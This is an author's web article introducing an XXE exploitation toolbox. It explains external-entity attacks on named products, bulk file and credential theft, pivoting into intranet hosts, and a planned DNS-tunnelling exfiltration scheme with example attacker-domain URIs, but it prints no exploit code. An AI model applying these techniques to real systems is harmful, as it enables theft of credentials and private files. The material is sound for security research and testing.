[ Beneath the Waves ]

On The Outside, Reaching In

article by Ben Lincoln


This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.

The software described is a "preview release" which is not yet feature-complete and which is has not been tested on a variety of systems. Even if you are allowed to use the software, you should do so with caution, on systems which can be easily restored to their previous state if they are damaged.

Table of contents

  1. Introduction — what is On The Outside, Reaching In?
  2. XML (External) Entity Vulnerabilities
  3. Practical and Useful XXE Exploitation
  4. Current Modules
  5. Known Limitations
  6. Future Releases and Planned Features
  7. If You Would Like To Contribute
  8. Artwork and Historical Screenshots

Introduction — what is On The Outside, Reaching In?

XXE Vulnerability Exploitation
[ Basic XXE attack (McAfee ePO) ]
Basic XXE attack (McAfee ePO)
[ Advanced XXE attack (Mahara) ]
Advanced XXE attack (Mahara)

Certain versions of McAfee ePolicy Orchestrator are vulnerable to the most straightforward sort of XXE issue. In the first illustration, the attacking system causes an ePO dashboard to be created. Because of the XXE technique, the ePO server inserts the contents of its own db.properties file into the dashboard's description. The attacking system is then able to view the contents of that file by reading the description of the dashboard as displayed in the ePO web interface.
The second — much more complicated — series of diagrams illustrates the basic concept described by Timur Yunusov and Alexey Osipov in their whitepaper on out-of-band XXE techniques and the slides from the corresponding BlackHat EU 2013 presentation.
In short, the vulnerable Mahara CMS is tricked into sending the contents of a sensitive file to a malicious webserver acting on behalf of the attacker.
For more technical readers, the out-of-band data is generally base64-encoded — among other things, this allows for binary data to be retrieved.


On The Outside, Reaching In is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities.

In the current release, it has two major functions:

  1. Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target).
  2. Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets.

In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features.

Conceptually, it is similar to the Metasploit Framework: provide a package of related exploits based around a common core which allows new exploits of similar types to be quickly developed because so much of the code is reusable. The specifics of exploitation are significantly different, however.

XML (External) Entity Vulnerabilities

(This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.)

XML (a widely-used — especially in so-called "enterprise" software — markup language) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I have need for an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished.

This type of entity can be misused in several XML libraries to cause the target system to run out of memory — the specific techniques are frequently known as "Billion Laughs", and the "Quadratic Blowup". Both of these are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases.

Where XML entites become interesting (in my opinion) is that the specification also defines what's called an "external entity". As the name implies, this is a reference to information which is stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else, and this extension of the entity concept allows that to take place, rather than copying the information into the new document.

This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data.

For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario.

Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system.

This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities.

Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration[2].

Practical And Useful XXE Exploitation

Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible.

In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions:

  1. Database credentials and/or connection strings.
  2. SSH private keys.
  3. TLS/SSL certificates and their private keys.
  4. Lists of valid usernames
  5. Configuration files
  6. System information (from /proc)
  7. Information about installed software and other components (which may reveal vulnerabilities)

Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password).

On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities.

Because XML external entities are referenced in the form of URIs, then the potential is there to not only access content from the target server's filesystem, but to use that target server as a reverse HTTP proxy into the environment that is hosting it (as well as any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities for URIs like, https://intranet.local/confidential/blueprints/DeathStar.dwg, or ftp://ftp.local/bank_account_list.txt, when those URIs are accessed not by the attacker's system (which hopefully has no network level access to any of them), but by the exposed server with an XXE vulnerability, which is on the same (hypothetical) network that those sensitive internal URIs are pointing to.

On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well.

Current Modules

The current release of On The Outside, Reaching In includes the following modules:

Known Limitations

In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future:

In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool.

See the documentation for individual modules for more details.

Future Releases and Planned Features

Some of the things I'd like to include in future releases (not in any particular order):

It would be tough to integrate into this particular tool (it would require the DNS equivalent of She Wore A Mirrored Mask, for one thing), but I like the idea of doing a combined XXE + DNS-tunneling data exfiltration. E.g. the system that has the data does not have internet access of any kind, but it can make calls to a vulnerable Solr server which is allowed to perform DNS lookups against a DNS server which is configured in the standard way (IE it can make requests to DNS servers on the internet). The data is chunked and encoded as a series of base32 values of length 63 characters or less, which have a domain name belonging to the attacker appended (e.g. kle14l5a14a14355al55312qpbgah1355hgal55al515la5351la31bgl145a34.sll2454a52423524qbnau34labiweaalbuayk51i545bh14k3hb51w43kba145b.chunk000047.dnstunnel.reallycleverplan.com, etc.). Solr is made to attempt to load content from each of those domains (by using --exacturilist mode with a series of URIs like http://kle84l5a84a84375al75382qpbgah8357hgal57al785la7358la68bgl847a64.sll9474a79496794qbnau64labiweaalbuayk78i547bh84k6hb78w46kba847b.chunk000047.dnstunnel.reallycleverplan.com/do_not_care_if_this_exists_or_not.html, etc.). It doesn't have to succeed at loading the content (although getting an HTTP response of some kind instead of a timeout will make it run much faster), but just by performing the DNS lookup, it will cause the encoded data to be sent to the authoritative DNS server for the domain in question (which would be running the aforementioned DNS equivalent of She Wore A Mirrored Mask). The encoded data can then be re-assembled into the original file.

If You Would Like To Contribute

Please get in touch with me using the Contact form.

Artwork and Historical Screenshots

Artwork and Historical Screenshots
[ Screenshot of the highest-resolution banner ]
Screenshot of the highest-resolution banner
[ First successful out-of-band binary file download ]
First successful out-of-band binary file download
[ Higher-resolution version of the icon/banner artwork (ANSI art version) ]
Higher-resolution version of the icon/banner artwork (ANSI art version)
[ Higher-resolution version of the icon/banner artwork ]
Higher-resolution version of the icon/banner artwork




File Size Version Release Date Author
On The Outside, Reaching In 4 MiB 0.3 2014-07-20 Ben Lincoln
File Size Version Release Date Author
On The Outside, Reaching In 4 MiB 0.2.1 2014-06-22 Ben Lincoln
Includes several lists for scraping /proc on Linux target systems.
File Size Version Release Date Author
On The Outside, Reaching In 343 KiB 0.2 2014-06-15 Ben Lincoln
1. Some of the diagrams on this page contain OpenOffice/LibreOffice Draw shapes created by Frank Ebert.
2. See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding BlackHat EU 2013 presentation - also by Timur Yunusov and Alexey Osipov.
[ Page Icon ]